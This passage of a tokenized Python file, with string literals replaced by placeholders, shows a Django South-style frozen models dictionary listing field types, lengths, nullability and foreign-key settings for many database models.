'<STR_LIT:filename>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:None>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:None>' , '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:None>' , '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : [ u'<STR_LIT>' ] } , <EOL> u'<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:status>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:None>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT:date>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT:message>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:version>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:1>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:type>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT:user>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:type>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:filename>' : ( 